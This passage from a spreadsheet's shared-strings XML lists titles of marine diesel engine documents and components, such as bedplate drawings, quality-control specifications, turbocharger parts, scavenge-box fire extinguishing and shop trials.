    <t>SA FOR EXHAUST RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS FUEL NOZZLE,HEATTREATM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASUR.SHEET, RECIP.PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC. CYL.COVER FIRST TIME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECIP.PARTS,INSP.ON BOARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC  SCHEMES/INSPECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGN+ASSEMBL. BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGNMENT, FREE SPACE FOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPT BEARINGS+CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR BEARING LOAD MEASURING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE DRUM FOR PIANO WIRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILE OFF CRANK JOURNALS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGN BEDPL.,COMM.VESSELS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine test bed</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REAMING BEDPL.+FRAMEBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT COVERS+VALVES,F.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT SHORT STAY BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIR PIPE ASS.+MOUNT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR ALIGN CAMSHAFT PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGN ROLLERGUIDE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT VALVEGEAR+FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT CONTROL SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF ANGLE ENCODER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR ALPHA CYL. LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT CYL.LUBR.+GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLING OF CYL.FRAMES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT CHAIN TIGHTENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT WATERCON.+EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT VAR.THERMOMETER PCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISMANTLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT CENTRE GALLERY, MAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT UPPER GALLERY, MAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF POWER TAKE OFF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECK CLEARANCE AFT.TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECK OF CAMS ON CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY GENERAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDATION DOCU. BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDATION DOCU. FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDATION DOCU. CYL. FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OF BEARING B.SEATRIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR LASER&amp;PIANOWIRE ALIGN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR SAFETY CHECK O.TESTBED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISPATCH PATTERN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dispatch Pattern Variants</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISPATCH PATTERN SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISPATCH PATTERN TC EXH.S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISPATCH PATTERN TC AFT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dispatch Pattern Classes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESERVATION INSTRUCTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECH.DATA, AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROTOR SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAB.SEAL TURB.END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALANCING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRE-ROTOR WITH RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIFFUSOR-MARKED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ZINC BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING HOUSING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING SEGMENT-A</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING SEGMENT-B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-INSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-OUTSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD WITH CLEANING UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FELT GUARDS COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FELT GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIQUID INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF CHEM.CLEANING A.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER BOX + PIPES, REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER WASH.ARR.F.TURBOCH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY DRAWING LKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOL.HOUSING LKV-LKW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOL.HOUSING LLK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOL.HOUSING SLK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOL.HOUSING BLK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOL.HOUSING LKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSERT KLK COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSMEMBER FOR INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERING OF CHARG AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Airflow rev. chamber, welding</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE PLATE FOR END COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE PLATE-AIR REV.CHAMB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET WITH ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL FOR ROTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTENSION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMPING TOOL FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSMEMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCK FOR ROTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING PIPE STEAM-AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS-COOLER INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC TIGHTENING MINOR BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS RELIEF VALVE FUNC.TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WET MAGN.PARTICLE INSPEC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CAST IRON TEST SAMPLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS GRINDM. EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS DISTRBUTOR BLOCK,HYDR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR Flushing,main engine, testbed</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR Flushing, Fuel system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flushing, Engine, shipyard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR HP FUEL OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC WELD.AREAS BY ETCHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CAST STEEL BRG.SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CAST CYL.COVERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS PISTON RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC PISTON RING ALU.BRONCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC PISTON RING RUN-IN-LAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS FORGED GEAR WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CYL.COVER  RECON. WELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC REV.LINK FIRST TIME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS CAST CRANK THROW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS EXH.BOT.PIECE I.HARDN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS CRANKSHAFT &amp; FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR EXH. SPINDLE ROLLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR CYL.LINER ROLLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR CYL.LINER, LUB BORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR INSTAL.HOF FITTED BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES CLEAN. &amp; TREATMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS CON.ROD THRUST PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS WELD.SPEC.COOL.BOTTOMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS PISTON CROWN WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QI-S REVERSING LINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADM. SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR PIPES CLEAN. + TREATM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR HYDRAULIC OIL SAMPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR MOUNTING,GEARBOX COMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS HYDRAULIC PUMP UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS Lifting Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr. Tensile Fixture, LiftTool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SITE TRIAL,          MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PRESSURE HOSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUNDAMENT FOR PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF AUX. BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ST. AIR DISTRIB. DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ST. AIR DISTRIB. MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ST.AIR DISTRIB-PARTS LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE DETECTION,SCAV. BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CO2 EXTING.IN SCAV.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEAM EXTING.IN SCAV.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HALON EXTING. IN SCAV.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER EXTING.IN SCAV.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTINGUISHING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM, TANK DEW POINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-CO2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-STEAM EXTING.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-STEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-W.MIST EXTING.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXCHANGE OF TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEATING OF FUEL OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEATING F.O.DRAINPIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel Oil Pipes, Elec. Heating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS ALTERATIONS-PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCK WITH STRAIGHT PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTERNAL PIPES ENG. ROOM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEARANCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>APPENDIX A</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMO TECHN.FILE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>APPENDIX B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IACS UR M44 DOCUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLANT SPEC. REMARKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAT BALANCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOP TRIAL, RUNNING-IN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOP TRIAL, DELIVERY TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUOND MEASUREMENT CURVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POWER REDUCTION DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Longitudinal section</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SFOC CURVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUFFTRIDE PROCESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF EXTER. CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECHNICAL DATA FW-PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CALCULATION SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Geometric boundary conditions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORM+POS.TOL.-BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-SECTIONAL VIEWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-FORE-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE TOP VIEW-MACHIN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE BOTTOM VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE SPECIAL BORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCOLAN LB-PROCESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE,JOURNAL BRG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING ATTACHMENT-OILPAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTION IN BEDPLATE W.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE FOR SOLID CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT. TOOL FOR CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL F.MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC TIGHTENING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITEMETAL, MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITEMETAL IN JOURNAL BRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEC.FOUNDATION FRAME WELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEC.FOUNDATION FRAME MACH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE FRAME MAIN DIMENSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE FRAME FRONT WIEW MAC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUAL.SPEC.F.WELD.SUPP.FL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSTRUCTION,FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORM+POS.TOL.-FRAME ccc</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR. FOR BENDING PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT.PLAN/PL.LIST-FR.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-SECTIONAL VIEWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-INTERM.MACHIN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.BOX-INTERM.-FORE-MACH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.BOX-INTERM.-AFT-MACHIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME INTERMEDIATE SECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME AFT END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM FOR THERMOSENSORS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF GUIDE BRG.SHELLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAKERS OF THERMOSENSORS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK STAYBOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEXT SHEET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRILL PLAN THERMAL SENSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL. DRAWING FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>V-RING ON CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL FRAME W.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTIONS FOR GLUE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE LIST-TOP UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING NON-RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Housing, non-return valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. FRAME INTERM.SECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. FRAME BOTTOM VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORM + POS.TOL.-CYL.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUALITY INSTR.F.CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSBAR F.CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT. TOOL F.CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.POINTS,CYL.LIN. WEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wave cut machine for cyl. liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVES-ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBUSTION CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COV.UP.PART-FRONTVIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COV.UP.PART-SIDE VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COV.UP.PART-BOTT.VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST DUCT-CROSS SECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET DUCT CROSS SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COV.UP-PLANE SECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COV.-UPPER-CROSS SECT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COVER SIDE VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET DUCT, SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST DUCT, SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cyl. Cover Rack - Mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILL+GRIND.WH, ST.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT VIEW FROM FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT VIEW FROM AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORM + POS.TOL.CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
